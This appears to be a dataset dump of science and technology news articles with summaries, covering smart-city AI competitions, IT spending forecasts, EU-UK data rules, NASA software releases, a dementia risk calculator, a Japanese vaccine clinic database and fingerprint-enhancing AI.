Chinese tech giants Alibaba and Baidu took first and second place in all five categories in the recent AI City Challenge, outperforming competitors from almost 40 countries. Carnegie Mellon University's Stan Caldwell points out that China invests twice as much as the U.S. in research and development as a share of gross domestic product. Caldwell said, "We want the technologies to develop, because we want to improve safety and efficiency and sustainability. But selfishly, we also want this technology to develop here and improve our economy." The U.S. National Institute for Standards and Technology is calling on American artificial intelligence (AI) researchers to participate in its Automated Streams Analysis for Public Safety (ASAPS) Challenge Program, which aims to develop AI to help emergency operators predict when their services will be needed. Four years ago, organizers created the international AI City Challenge to spur the development of artificial intelligence for real-world scenarios like counting cars traveling through intersections or spotting accidents on freeways. In the first years, teams representing American companies or universities took top spots in the competition. Last year, Chinese companies won three out of four competitions. Last week, Chinese tech giants Alibaba and Baidu swept the AI City Challenge, beating competitors from nearly 40 nations. Chinese companies or universities took first and second place in all five categories. TikTok creator ByteDance took second place in a competition to identify car accidents or stalled vehicles from freeway videofeeds. The results reflect years of investment by the Chinese government in smart cities. Hundreds of Chinese cities have pilot programs, and by some estimates, China has half of the world's smart cities. The spread of edge computing, cameras, and sensors using 5G wireless connections is expected to accelerate use of smart-city and surveillance technology. The tech displayed in these competitions can be useful to city planners, but it also can facilitate invasive surveillance. Counting the number of cars on the road helps civic engineers understand the resources required to support roads and bridges, but tracking a vehicle across multiple live camera feeds is a powerful form of surveillance. One of the competitions in the AI City Challenge asked participants to identify cars in videofeeds; for the first time this year, the descriptions were in ordinary language, such as "a blue Jeep goes straight down a winding road behind a red pickup truck." The competition comes at a time of increased tech nationalism and tension between the US and China , and growing concern over the powers of AI. The Carnegie Endowment for International Peace in 2019 called China "a major driver of AI surveillance worldwide." The group said China and the US were the two leading exporters of the technology. Last month, the Biden administration expanded a blacklist started by the Trump administration to nearly 60 Chinese companies barred from receiving investment from US financiers. Also in recent weeks, the US Senate passed the Competition and Innovation Act , providing billions in investment for chips, AI, and supply chain reliability. It also calls for investment in smart cities, including expanding a smart-city partnership with southeast Asian nations (excluding China). China's domination of the smart-city challenge may come with an asterisk. 
John Garofolo, a US government official involved in the competition, says he noticed fewer US teams this year. Organizers say they don't track participants by country. Stan Caldwell is executive director of Mobility21, a project at Carnegie Mellon University assisting smart-city development in Pittsburgh. Caldwell laments that China invests twice as much as the US in research and development as a share of GDP, which he calls key to staying competitive in areas of emerging technology. He says AI researchers in the US can also compete for government grants like the National Science Foundation's Civic Innovation Challenge or the Department of Transportation's Smart City Challenge. A report released last month found that a $50 million DOT grant to the city of Columbus, Ohio, never quite delivered on the promise of building the smart city of the future. "We want the technologies to develop, because we want to improve safety and efficiency and sustainability. But selfishly, we also want this technology to develop here and improve our economy," Caldwell says. Spokespeople for Alibaba and Baidu declined to comment, but advances from smart-city challenges can help fuel commercial offerings for both companies. Alibaba's City Brain tracks more than 1,000 traffic lights in the company's hometown of Hangzhou, a city of 10 million people. A pilot program found that City Brain reduced congestion and helped clear the way for emergency responders.
169
Tech Spending Expected to Rise as Pandemic Restrictions Ease, Economy Improves
CIOs at U.S. companies across several industries are expected to spend more on software in 2021, with an emphasis on software related to process automation, artificial intelligence and security. Market researcher Forrester Research Inc. last week raised its forecast for enterprise technology spending for this year, citing stimulus funding and stronger-than-expected economic data. As pandemic restrictions ease, information technology budgets at U.S. businesses and governments are now projected to rise to nearly $2 trillion this year, up 7.4% from 2020, according to the Forrester report. In December, Forrester projected IT spending would fall 0.4% this year, compared with increases of 6.7% in 2019 and 1.8% in 2020. Then in April, Forrester forecast budgets would grow 6% year-over-year in 2021. The upward revisions reflect the impact of an economic stimulus package President Biden signed into law in March, said Andrew Bartels, a research analyst at Forrester. Of all spending, communications equipment is the fastest-growing spending category, forecast to rise 13.2% this year. Spending in the category fell last year as people moved to remote work, but it is expected to pick up again as offices reopen, Mr. Bartels said. Forrester in April forecast communications equipment spending would increase 12.4% this year. "Activities are coming back again," Mr. Bartels said. "And as they do so, [businesses] become buyers of technologies to support the reopening." Cambia Health Solutions Inc. plans a double-digit increase in spending on artificial intelligence and consumer-facing applications this year even as its overall IT budget remains flat. The Portland, Ore.-based healthcare company is transitioning to a post-pandemic hybrid work environment, according to Laurent Rotival, its CIO. "We are increasing our focus and spend on the accelerated evolution of our network and infrastructure to serve employees, partners, customers, and health plan members anywhere," Mr. Rotival said. Edward Wagoner, digital CIO of Jones Lang LaSalle Inc. , said more data tools and capabilities are a top priority for some of the commercial real estate services company's customers. Adopting a hybrid approach to work is an important factor in retaining top talent, Mr. Wagoner added, and companies need to be equipped to collect and analyze those preferences. Software spending, the second-fastest growing segment of IT spending, is forecast to rise 10.4% this year, compared with an April forecast of 9.7% growth. Mr. Bartels said many companies are greenlighting new software spending after taking a cautious approach in 2020. Within software, spending on platforms for process automation and AI are projected to grow 33% and 13%, respectively, this year. Security software spending is projected to grow 11%. Spending on software will reach $482 billion in 2022, according to Forrester, marking the first time it will surpass CIO staff spending, which is forecast at $470 billion next year. Write to Jared Council at [email protected]
Market researcher Forrester Research has revised its 2021 forecast of U.S. enterprise information technology (IT) spending growth from 6% to 7.4% over 2020 levels, the result of increased stimulus funding, the easing of pandemic restrictions, and stronger than anticipated economic data. Forrester's Andrew Bartels said communications gear is the fastest-growing spending area, projected to increase 13.2% as offices reopen. Spending on software, the second-fastest-growing IT category, is expected to rise 10.4% this year, up from an April forecast of 9.7%. Process automation and AI software spending should increase 33% and 13%, respectively, while security software investing is expected to climb 11%. Said Bartels, "Activities are coming back again, and as they do so, [businesses] become buyers of technologies to support the reopening."
[]
[]
[]
scitechnews
None
None
None
None
Market researcher Forrester Research has revised its 2021 forecast of U.S. enterprise information technology (IT) spending growth from 6% to 7.4% over 2020 levels, the result of increased stimulus funding, the easing of pandemic restrictions, and stronger than anticipated economic data. Forrester's Andrew Bartels said communications gear is the fastest-growing spending area, projected to increase 13.2% as offices reopen. Spending on software, the second-fastest-growing IT category, is expected to rise 10.4% this year, up from an April forecast of 9.7%. Process automation and AI software spending should increase 33% and 13%, respectively, while security software investing is expected to climb 11%. Said Bartels, "Activities are coming back again, and as they do so, [businesses] become buyers of technologies to support the reopening." CIOs at U.S. companies across several industries are expected to spend more on software in 2021, with an emphasis on software related to process automation, artificial intelligence and security. Market researcher Forrester Research Inc. last week raised its forecast for enterprise technology spending for this year, citing stimulus funding and stronger-than-expected economic data. As pandemic restrictions ease, information technology budgets at U.S. businesses and governments are now projected to rise to nearly $2 trillion this year, up 7.4% from 2020, according to the Forrester report. In December, Forrester projected IT spending would fall 0.4% this year, compared with increases of 6.7% in 2019 and 1.8% in 2020. Then in April, Forrester forecast budgets would grow 6% year-over-year in 2021. The upward revisions reflect the impact of an economic stimulus package President Biden signed into law in March, said Andrew Bartels, a research analyst at Forrester. Of all spending, communications equipment is the fastest-growing spending category, forecast to rise 13.2% this year. Spending in the category fell last year as people moved to remote work, but it is expected to pick up again as offices reopen, Mr. Bartels said. Forrester in April forecast communications equipment spending would increase 12.4% this year. "Activities are coming back again," Mr. Bartels said. "And as they do so, [businesses] become buyers of technologies to support the reopening." Cambia Health Solutions Inc. plans a double-digit increase in spending on artificial intelligence and consumer-facing applications this year even as its overall IT budget remains flat. The Portland, Ore.-based healthcare company is transitioning to a post-pandemic hybrid work environment, according to Laurent Rotival, its CIO. "We are increasing our focus and spend on the accelerated evolution of our network and infrastructure to serve employees, partners, customers, and health plan members anywhere," Mr. Rotival said. Edward Wagoner, digital CIO of Jones Lang LaSalle Inc. , said more data tools and capabilities are a top priority for some of the commercial real estate services company's customers. Adopting a hybrid approach to work is an important factor in retaining top talent, Mr. Wagoner added, and companies need to be equipped to collect and analyze those preferences. Software spending, the second-fastest growing segment of IT spending, is forecast to rise 10.4% this year, compared with an April forecast of 9.7% growth. Mr. Bartels said many companies are greenlighting new software spending after taking a cautious approach in 2020. 
Within software, spending on platforms for process automation and AI are projected to grow 33% and 13%, respectively, this year. Security software spending is projected to grow 11%. Spending on software will reach $482 billion in 2022, according to Forrester, marking the first time it will surpass CIO staff spending, which is forecast at $470 billion next year. Write to Jared Council at [email protected]
170
EU Citizens' Data Will Continue Flowing into the U.K.
The European Commission (EC) has adopted adequacy decisions that designate U.K. data protection laws equivalent to European Union (EU) statutes, which will permit EU-U.K. data flows to continue following Brexit. The decision means Europeans' personal data will receive the same level of protection in Britain as it would inside the bloc. The EU for the first time has included a sunset clause, meaning the decisions will end four years after they are enacted. U.K. secretary of state for digital Oliver Dowden said the EU's formal recognition of the U.K.'s data protection standards "will be welcome news to businesses, support continued cooperation between the U.K. and the EU, and help law enforcement authorities keep people safe."
[]
[]
[]
scitechnews
None
None
None
None
The European Commission (EC) has adopted adequacy decisions that designate U.K. data protection laws equivalent to European Union (EU) statutes, which will permit EU-U.K. data flows to continue following Brexit. The decision means Europeans' personal data will receive the same level of protection in Britain as it would inside the bloc. The EU for the first time has included a sunset clause, meaning the decisions will end four years after they are enacted. U.K. secretary of state for digital Oliver Dowden said the EU's formal recognition of the U.K.'s data protection standards "will be welcome news to businesses, support continued cooperation between the U.K. and the EU, and help law enforcement authorities keep people safe."
171
NASA Makes More Than 800 Innovations Available to Public
The public will now have access to many of NASA's computational innovations thanks to a new effort to make some of them available for download . NASA Administrator Bill Nelson said in a statement that there are more than 800 pieces of software created by the organization that have helped operations both on Earth and on missions to the Moon and Mars. NASA is sharing the programs through its Technology Transfer program which is run by the Space Technology Mission Directorate. NASA noted that it was important for American taxpayers to benefit from technologies developed by and for NASA. "The good news is this technology is available to the public for free," Nelson said. "The software suited for satellites, astronauts, engineers, and scientists as it is applied and adapted across industries and businesses is a testament to the extensive value NASA brings to the United States -- and the world." NASA provided a detailed outline of how people and companies can use their software, advising those interested to find NASA technologies for licensing at technology.nasa.gov and then submit a license application and commercialization plan online. If the application is accepted, the person or company will work with a NASA licensing manager to set the terms of the license agreement before a final agreement is signed. NASA has long collaborated with public and private organizations on a variety of efforts like TetrUSS. Researchers at NASA worked on reducing aircraft emissions through computational fluid dynamics programs that minimize drag. TetrUSS has now become one of the organization's most downloaded applications ever and is currently in use in the production of planes, trains, cars, boats and even buildings. NASA also cited its work with WorldWind, a data visualization tool that they said is currently helping the Coast Guard generate maps from live feeds of satellite and maritime data. The project has helped "decision-makers worldwide manage scarce resources" and "researchers understand climate impacts on freshwater resources." Technology Transfer Program Executive Dan Lockney said many of NASA's programs will be integral in addressing the effects of climate change. "By making our repository of software widely accessible, NASA helps entrepreneurs, business owners, academia, and other government agencies solve real problems," Lockney said. In addition to TetrUSS and WorldWind, NASA also has programs that can calculate a solar power system's size and power requirements using fuel cells, solar cells, and batteries as well as code that can analyze solar aircraft concepts. Other software for computational fluid dynamics may help "improve the efficiency of wind turbines for power generation." The rest of NASA software catalog includes categories like system testing, aeronautics, data and image processing, autonomous systems, and more. The software is also continuously updated in a searchable repository. NASA will hold a virtual event on July 13 to explain the effort more and answer questions.
The U.S. National Aeronautics and Space Administration (NASA) will make more than 800 software products created by the agency freely available to the public through the Space Technology Mission Directorate's Technology Transfer Program. NASA, which emphasized the importance of American taxpayers benefiting from its innovations, is providing a detailed outline of how individuals and organizations may be able to utilize its software. Interested parties are encouraged to contact NASA at technology.NASA.gov for assistance in identifying technologies that can be licensed; qualified potential users also will need to submit a license application and commercialization plan online.
[]
[]
[]
scitechnews
None
None
None
None
The U.S. National Aeronautics and Space Administration (NASA) will make more than 800 software products created by the agency freely available to the public through the Technology Mission Directorate's Technology Transfer Program. NASA, which emphasized the importance of American taxpayers benefiting from its innovations, is providing a detailed outline of how individuals and organizations may be able to utilize their software. Interested parties are encouraged to contact NASA at technology.NASA.gov for assistance in identifying technologies that can be licensed; qualified potential users also will need to submit a license application and commercialization plan online. The public will now have access to many of NASA's computational innovations thanks to a new effort to make some of them available for download . NASA Administrator Bill Nelson said in a statement that there are more than 800 pieces of software created by the organization that have helped operations both on Earth and on missions to the Moon and Mars. NASA is sharing the programs through its Technology Transfer program which is run by the Space Technology Mission Directorate. NASA noted that it was important for American taxpayers to benefit from technologies developed by and for NASA. "The good news is this technology is available to the public for free," Nelson said. "The software suited for satellites, astronauts, engineers, and scientists as it is applied and adapted across industries and businesses is a testament to the extensive value NASA brings to the United States -- and the world." NASA provided a detailed outline of how people and companies can use their software, advising those interested to find NASA technologies for licensing at technology.nasa.gov and then submit a license application and commercialization plan online. If the application is accepted, the person or company will work with a NASA licensing manager to set the terms of the license agreement before a final agreement is signed. NASA has long collaborated with public and private organizations on a variety of efforts like TetrUSS. Researchers at NASA worked on reducing aircraft emissions through computational fluid dynamics programs that minimize drag. TetrUSS has now become one of the organization's most downloaded applications ever and is currently in use in the production of planes, trains, cars, boats and even buildings. NASA also cited its work with WorldWind, a data visualization tool that they said is currently helping the Coast Guard generate maps from live feeds of satellite and maritime data. The project has helped "decision-makers worldwide manage scarce resources" and "researchers understand climate impacts on freshwater resources." Technology Transfer Program Executive Dan Lockney said many of NASA's programs will be integral in addressing the effects of climate change. "By making our repository of software widely accessible, NASA helps entrepreneurs, business owners, academia, and other government agencies solve real problems," Lockney said. In addition to TetrUSS and WorldWind, NASA also has programs that can calculate a solar power system's size and power requirements using fuel cells, solar cells, and batteries as well as code that can analyze solar aircraft concepts. Other software for computational fluid dynamics may help "improve the efficiency of wind turbines for power generation." The rest of NASA software catalog includes categories like system testing, aeronautics, data and image processing, autonomous systems, and more. 
The software is also continuously updated in a searchable repository. NASA will hold a virtual event on July 13 to explain the effort more and answer questions.
172
Free Online Calculator for Dementia Risk
Researchers in Canada have created an easily accessible tool for people worried about the possibility of cognitive decline as they grow older. The online calculator is supposed to estimate the general risk of dementia for the average person 55 and older and is based on research published this month. Dementia is a broad term for many conditions, linked by the usually worsening loss of cognitive functions like memory. The most common form, Alzheimer's disease, is thought to affect 50 million people worldwide. Dementia is generally not curable once symptoms start, and it often leads to death. Our risk of dementia climbs the older we become, though there are some forms directly tied to inherited genetic mutations, which may occur earlier in life. But doctors do suspect there are many controllable aspects of our environment that influence dementia risk, and several studies have suggested over a third of cases could be preventable through changing these aspects for the better. This new research, led by scientists at the University of Ottawa, builds on these earlier studies by trying to create a predictive algorithm for the short-term risk of dementia in the general population. It was created through studying the responses of 50,000 residents of Ontario, Canada, 55 years old and up, who were part of a long-running population study in which they answered basic questions about their current health and lifestyle. Their (anonymous) medical records were tracked following their participation in the study, which meant researchers could tell how many were diagnosed with dementia over the next five years. The researchers compared the people with dementia to those without to see which risk factors seemed to be most predictive and fed all this information into the algorithm. Then they tested out their calculations on another sample of 25,000 people and found that it was generally accurate in predicting a person's dementia risk. The study's findings were published over the weekend in the Journal of Epidemiology and Community Health, and the calculator can be accessed on their Project Big Life website. The website also contains similar tools for estimating life expectancy and risk of heart disease. (In a show of faith, perhaps, the bios of the research team include their life expectancy, presumably obtained through said tool.) Among other things, the brief questionnaire used for the dementia calculator asks about suspected risk factors such as smoking history, level of physical activity, and other chronic illnesses. It then pops out a number from 1 to 100, estimating risk of dementia in the next five years, and provides a top three list of modifiable risk factors and possible ways to change them, along with links to further relevant information. Though it's based on scientific evidence, this calculator (and really any predictive algorithm) shouldn't be interpreted as a sure thing. At best, it may provide a rough sense of general dementia risk, not a precise prediction, and it's most accurate for the average person with no other hidden risk factors like family history or genetics. Indeed, the authors caution in their FAQ that their model simply can't take genetics into account, since the survey data didn't have that information available. People worried about the results they get from the calculator should talk with a medical provider about their brain health.
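To make the modelling approach described above concrete, here is a minimal, hypothetical sketch of that kind of pipeline: fit a risk model on survey-style features for one cohort, validate it on a held-out sample (mirroring the 50,000/25,000 split described), and report a five-year risk score on a 0-100 scale. The feature names, coefficients, and data below are invented for illustration; this is not the Project Big Life algorithm.

```python
# Illustrative sketch only: survey-style features -> held-out validation -> 0-100 risk score.
# All features, coefficients, and data are synthetic assumptions, not the published model.
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import roc_auc_score

rng = np.random.default_rng(0)
n = 75_000  # e.g. 50k for fitting + 25k for validation, echoing the study design
X = np.column_stack([
    rng.normal(70, 8, n),        # age
    rng.integers(0, 2, n),       # smoker (0/1)
    rng.normal(3, 2, n),         # weekly physical activity (hours)
    rng.integers(0, 4, n),       # number of chronic conditions
])
# Synthetic outcome: dementia diagnosis within five years
logit = -9.0 + 0.08 * X[:, 0] + 0.5 * X[:, 1] - 0.2 * X[:, 2] + 0.4 * X[:, 3]
y = rng.random(n) < 1 / (1 + np.exp(-logit))

X_fit, X_val, y_fit, y_val = train_test_split(X, y, test_size=25_000, random_state=0)
model = LogisticRegression(max_iter=1000).fit(X_fit, y_fit)
print("validation AUC:", round(roc_auc_score(y_val, model.predict_proba(X_val)[:, 1]), 3))

# Score one (hypothetical) respondent on a 0-100 scale
person = np.array([[68, 1, 1.0, 2]])
risk = model.predict_proba(person)[0, 1]
print(f"estimated 5-year risk: {100 * risk:.0f}/100")
```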
Scientists at Canada's University of Ottawa (U of O) have developed a calculator capable of estimating the general risk of dementia for people 55 and older, which they are making available for use online, for free. The researchers based the calculator's predictive algorithm on the responses of 50,000 Ontarians age 55 and older to health and lifestyle queries, and follow-up tracking of their medical records over five years. The U of O team compared data on individuals with dementia to data on those without dementia to determine the most predictive risk factors, which were incorporated into the algorithm. The researchers said the calculator cannot account for genetics, which means it may offer an approximate sense of general dementia risk at best.
[]
[]
[]
scitechnews
None
None
None
None
Scientists at Canada's University of Ottawa (U of O) have developed a calculator capable of estimating the general risk of dementia for people 55 and older, which they are making available for use online, for free. The researchers based the calculator's predictive algorithm on the responses of 50,000 Ontarians age 55 and older to health and lifestyle queries, and follow-up tracking of their medical records over five years. The U of O team compared data on individuals with dementia to data on those without dementia to determine the most predictive risk factors, which were incorporated into the algorithm. The researchers said the calculator cannot account for genetics, which means it may offer an approximate sense of general dementia risk at best. Researchers in Canada have created an easily accessible tool for people worried about the possibility of cognitive decline as they grow older. The online calculator is supposed to estimate the general risk of dementia for the average person 55 and older and is based on research published this month. Dementia is a broad term for many conditions, linked by the usually worsening loss of cognitive functions like memory. The most common form, Alzheimer's disease, is thought to affect 50 million people worldwide. Dementia is generally not curable once symptoms start, and it often leads to death. Our risk of dementia climbs the older we become, though there are some forms directly tied to inherited genetic mutations, which may occur earlier in life. But doctors do suspect there are many controllable aspects of our environment that influence dementia risk, and several studies have suggested over a third of cases could be preventable through changing these aspects for the better. This new research, led by scientists at the University of Ottawa, builds on these earlier studies by trying to create a predictive algorithm for the short-term risk of dementia in the general population. It was created through studying the responses of 50,000 residents of Ontario, Canada, 55 years old and up, who were part of a long-running population study in which they answered basic questions about their current health and lifestyle. Their (anonymous) medical records were tracked following their participation in the study, which meant researchers could tell how many were diagnosed with dementia over the next five years. The researchers compared the people with dementia to those without to see which risk factors seemed to be most predictive and fed all this information into the algorithm. Then they tested out their calculations on another sample of 25,000 people and found that it was generally accurate in predicting a person's dementia risk. The study's findings were published over the weekend in the Journal of Epidemiology and Community Health, and the calculator can be accessed on their Project Big Life website. The website also contains similar tools for estimating life expectancy and risk of heart disease. (In a show of faith, perhaps, the bios of the research team include their life expectancy, presumably obtained through said tool.) Among other things, the brief questionnaire used for the dementia calculator asks about suspected risk factors such as smoking history, level of physical activity, and other chronic illnesses. It then pops out a number from 1 to 100, estimating risk of dementia in the next five years, and provides a top three list of modifiable risk factors and possible ways to change them, along with links to further relevant information.
Though it's based on scientific evidence, this calculator (and really any predictive algorithm) shouldn't be interpreted as a sure thing. At best, it may provide a rough sense of general dementia risk, not a precise prediction, and it's most accurate for the average person with no other hidden risk factors like family history or genetics. Indeed, the authors caution in their FAQ that their model simply can't take genetics into account, since the survey data didn't have that information available. People worried about the results they get from the calculator should talk with a medical provider about their brain health.
173
LaShawn Toyoda Learned How to Code During the Pandemic. Japan's International Community Is Glad She Did.
The mood on her Twitter feed was dark and full of anxiety, so LaShawn Toyoda, 36, decided to do something about it. "People were really upset, scared and stressed out," she says. "With the Olympics coming up, worries about the pandemic were exacerbated by the slow rollout of the vaccine and the lack of (English-language) information about the voucher system. They had no idea when they would get one, and resources in languages other than Japanese were scarce." Toyoda had a new set of skills that she could apply to the problem, as she had recently learned to code. Originally from Maryland, she arrived in Japan after the country was hit by the Great East Japan Earthquake in March 2011. She worked as an English teacher until last spring, but left that job because she didn't feel comfortable teaching in-person classes during the pandemic, potentially bringing the coronavirus home to her baby. As she was trying to decide on her next step, Code Chrysalis co-founder Yan Fan reached out to her and suggested she try learning to code. Toyoda had always thought that coding might be interesting, but at the same time wasn't sure if she could really do it. She decided to give it a try, anyway. The course was intense, "like being in finals week of university except it lasts for three months." She adds that it's deceptive, because "everyone's so nice and so friendly, but the boot camp is brutal. There is a constant pressure to learn and cram so much, and a mountain of homework if you don't finish everything in class. Some people doubt you can learn to code in a couple of months, but it is possible when you are coding up to 16 hours a day." Then, on a Sunday night earlier this month, she asked her husband to watch her toddler and sat down to do some coding. The result was an open-source database of clinics offering waiting lists for appointments to get a COVID-19 vaccine across the country: findadoc.jp . Toyoda announced her creation on Twitter and woke up the next day to find there had been more than 60,000 requests to access the database, and that it had exceeded the free quota of her hosting service due to the large number of queries. "I thought people needed a service like this, but I didn't realize just how badly they needed it and that the demand would be so huge," she says. "By the end of the second day, the database hit over 300,000 requests as people scrambled to find clinics offering vaccinations." For the next week Toyoda hardly slept, juggling work on the database with her full-time job and taking care of her young daughter. Meanwhile, people came out of the woodwork to support her. Experienced developers from companies like Google, Amazon, Indeed and Mercari volunteered their help with the coding and know-how on managing such a project. Volunteer translators stepped up, and the database is now available in 17 languages. "I can't really take all of the credit," she says. "I started it, but the community really jumped in and helped to build it. I think it came at just the right time. So many people felt hopeless about the vaccine situation, but this gave them a way to do something." Having never worked on a project of this scope before, Toyoda has had to learn quickly. For example, the moment she thought she had everything ready and made her repository public, she got a warning from Google that she had left some secret keys on the internet that weren't supposed to be there. Fortunately, the many volunteers have been able to help. 
"They've been coaching me through the process without taking over the project, which is really nice," she says. "I feel like I've learned even more now than I did when I was taking programming courses just because I'm actually working on a real application." You might think that a project like this would be extremely stressful, but Toyoda seems to be taking it in stride. "When things get really worrisome or heated, that's when I tend to buckle down and focus on what I can do to improve the situation," she says. "Not just for myself, but also for others." Due to the many submissions from users, the database has grown from the handful that Toyoda originally posted, and currently covers about 50 clinics, with the number constantly fluctuating as clinics fill their slots and are then removed from the list. She has added a function for users to report when a clinic no longer has spots available or if their requirements have changed. That also means if spots become available, a clinic can go back on the list. It's good to keep checking back to see if one opens up near you. Toyoda says she will keep the project up through the end of the vaccination period. After that, she plans to pursue her original vision, created while she was studying at the Code Chrysalis bootcamp last year, of creating a database of doctors who can speak multiple languages. She is viewing this as a long-term project, and is thinking of starting a non-profit organization to house it. Toyoda is enjoying her new career as a programmer, and wishes she had made the career change from English teaching earlier. She's also glad that she has been able to use her new skills to help the community, and asks that people continue to submit clinics to the database so that everyone can get vaccinated as soon as possible. "There's a really small but great community of people here in Japan from all over the world that want to help each other and contribute to Japanese society," Toyoda says. "I just created a tool that empowers them to do so." Japan Find-a-doc Covid19 Vaccine Database Founder LaShawn Toyoda Ep266. 🎥Subscribe: https://t.co/mtafmDqvOw #live #findadoc #findadocjp #findadocjapan #vaccinations #availablevaccinations #vaccinationsjapan #COVID19Vaccine #lashawntoyoda https://t.co/C5IkwJLmYn - JJWalsh 🌿⛩️🏝️🐱🌺☀️ (@jjwalsh) June 29, 2021
LaShawn Toyoda, who lives in Japan, learned programming during the COVID-19 pandemic, and used it to develop an open source database of clinics offering waiting lists for coronavirus vaccination appointments across that country. Toyoda said the findadoc.jp database received over 300,000 access requests by its second day of operation. Once it was launched, seasoned developers volunteered their help with coding and database management. Said Toyoda, "I can't really take all of the credit. I started it, but the community really jumped in and helped to build it. I think it came at just the right time. So many people felt hopeless about the vaccine situation, but this gave them a way to do something."
[]
[]
[]
scitechnews
None
None
None
None
LaShawn Toyoda, who lives in Japan, learned programming during the COVID-19 pandemic, and used it to develop an open source database of clinics offering waiting lists for coronavirus vaccination appointments across that country. Toyoda said the findadoc.jp database received over 300,000 access requests by its second day of operation. Once it was launched, seasoned developers volunteered their help with coding and database management. Said Toyoda, "I can't really take all of the credit. I started it, but the community really jumped in and helped to build it. I think it came at just the right time. So many people felt hopeless about the vaccine situation, but this gave them a way to do something." The mood on her Twitter feed was dark and full of anxiety, so LaShawn Toyoda, 36, decided to do something about it. "People were really upset, scared and stressed out," she says. "With the Olympics coming up, worries about the pandemic were exacerbated by the slow rollout of the vaccine and the lack of (English-language) information about the voucher system. They had no idea when they would get one, and resources in languages other than Japanese were scarce." Toyoda had a new set of skills that she could apply to the problem, as she had recently learned to code. Originally from Maryland, she arrived in Japan after the country was hit by the Great East Japan Earthquake in March 2011. She worked as an English teacher until last spring, but left that job because she didn't feel comfortable teaching in-person classes during the pandemic, potentially bringing the coronavirus home to her baby. As she was trying to decide on her next step, Code Chrysalis co-founder Yan Fan reached out to her and suggested she try learning to code. Toyoda had always thought that coding might be interesting, but at the same time wasn't sure if she could really do it. She decided to give it a try, anyway. The course was intense, "like being in finals week of university except it lasts for three months." She adds that it's deceptive, because "everyone's so nice and so friendly, but the boot camp is brutal. There is a constant pressure to learn and cram so much, and a mountain of homework if you don't finish everything in class. Some people doubt you can learn to code in a couple of months, but it is possible when you are coding up to 16 hours a day." Then, on a Sunday night earlier this month, she asked her husband to watch her toddler and sat down to do some coding. The result was an open-source database of clinics offering waiting lists for appointments to get a COVID-19 vaccine across the country: findadoc.jp . Toyoda announced her creation on Twitter and woke up the next day to find there had been more than 60,000 requests to access the database, and that it had exceeded the free quota of her hosting service due to the large number of queries. "I thought people needed a service like this, but I didn't realize just how badly they needed it and that the demand would be so huge," she says. "By the end of the second day, the database hit over 300,000 requests as people scrambled to find clinics offering vaccinations." For the next week Toyoda hardly slept, juggling work on the database with her full-time job and taking care of her young daughter. Meanwhile, people came out of the woodwork to support her. Experienced developers from companies like Google, Amazon, Indeed and Mercari volunteered their help with the coding and know-how on managing such a project. 
Volunteer translators stepped up, and the database is now available in 17 languages. "I can't really take all of the credit," she says. "I started it, but the community really jumped in and helped to build it. I think it came at just the right time. So many people felt hopeless about the vaccine situation, but this gave them a way to do something." Having never worked on a project of this scope before, Toyoda has had to learn quickly. For example, the moment she thought she had everything ready and made her repository public, she got a warning from Google that she had left some secret keys on the internet that weren't supposed to be there. Fortunately, the many volunteers have been able to help. "They've been coaching me through the process without taking over the project, which is really nice," she says. "I feel like I've learned even more now than I did when I was taking programming courses just because I'm actually working on a real application." You might think that a project like this would be extremely stressful, but Toyoda seems to be taking it in stride. "When things get really worrisome or heated, that's when I tend to buckle down and focus on what I can do to improve the situation," she says. "Not just for myself, but also for others." Due to the many submissions from users, the database has grown from the handful that Toyoda originally posted, and currently covers about 50 clinics, with the number constantly fluctuating as clinics fill their slots and are then removed from the list. She has added a function for users to report when a clinic no longer has spots available or if their requirements have changed. That also means if spots become available, a clinic can go back on the list. It's good to keep checking back to see if one opens up near you. Toyoda says she will keep the project up through the end of the vaccination period. After that, she plans to pursue her original vision, created while she was studying at the Code Chrysalis bootcamp last year, of creating a database of doctors who can speak multiple languages. She is viewing this as a long-term project, and is thinking of starting a non-profit organization to house it. Toyoda is enjoying her new career as a programmer, and wishes she had made the career change from English teaching earlier. She's also glad that she has been able to use her new skills to help the community, and asks that people continue to submit clinics to the database so that everyone can get vaccinated as soon as possible. "There's a really small but great community of people here in Japan from all over the world that want to help each other and contribute to Japanese society," Toyoda says. "I just created a tool that empowers them to do so."
175
AI Clears Up Images of Fingerprints to Help with Identification
West Virginia University researchers have trained an artificial intelligence (AI) model to clean up distorted images of fingerprints from crime scenes to improve identification. The researchers developed a generative adversarial network by creating blurred versions of 15,860 clean fingerprint images from 250 subjects. They trained the AI using nearly 14,000 of these pairs of images; when they tested its performance on the remainder, they found the model to be 96% accurate at the lower end of the range of blurring intensity, and 86% at the higher end. Forensic Equity's David Goodwin said the use of neural networks to manipulate images would have trouble standing up in court because they cannot be audited like human-generated code, and the inner workings of these models are unknown.
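The summary above describes building training pairs by synthetically blurring clean fingerprint images at several intensities. The sketch below illustrates only that data-preparation step, using Gaussian blur from Pillow as a stand-in degradation model; the directory layout and blur radii are assumptions, and the WVU team's actual distortion model and GAN architecture are not reproduced here.

```python
# Hypothetical sketch of the data-preparation step: generate (blurred, clean)
# training pairs from clean fingerprint images at several blur intensities.
# Paths and the blur model are illustrative assumptions only.
from pathlib import Path
from PIL import Image, ImageFilter

CLEAN_DIR = Path("fingerprints/clean")   # assumed layout
PAIR_DIR = Path("fingerprints/pairs")
BLUR_RADII = [1, 2, 3, 4]                # low -> high distortion intensity

PAIR_DIR.mkdir(parents=True, exist_ok=True)
for img_path in sorted(CLEAN_DIR.glob("*.png")):
    clean = Image.open(img_path).convert("L")   # grayscale fingerprint
    for radius in BLUR_RADII:
        blurred = clean.filter(ImageFilter.GaussianBlur(radius=radius))
        # Save input and target side by side so a pix2pix-style model can read the pair
        pair = Image.new("L", (clean.width * 2, clean.height))
        pair.paste(blurred, (0, 0))
        pair.paste(clean, (clean.width, 0))
        pair.save(PAIR_DIR / f"{img_path.stem}_r{radius}.png")
```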
[]
[]
[]
scitechnews
None
None
None
None
West Virginia University researchers have trained an artificial intelligence (AI) model to clean up distorted images of fingerprints from crime scenes to improve identification. The researchers developed a generative adversarial network by creating blurred versions of 15,860 clean fingerprint images from 250 subjects. They trained the AI using nearly 14,000 of these pairs of images; when they tested its performance on the remainder, they found the model to be 96% accurate at the lower end of the range of blurring intensity, and 86% at the higher end. Forensic Equity's David Goodwin said the use of neural networks to manipulate images would have trouble standing up in court because they cannot be audited like human-generated code, and the inner workings of these models are unknown.
176
Fired by Bot at Amazon: 'It's You Against the Machine'
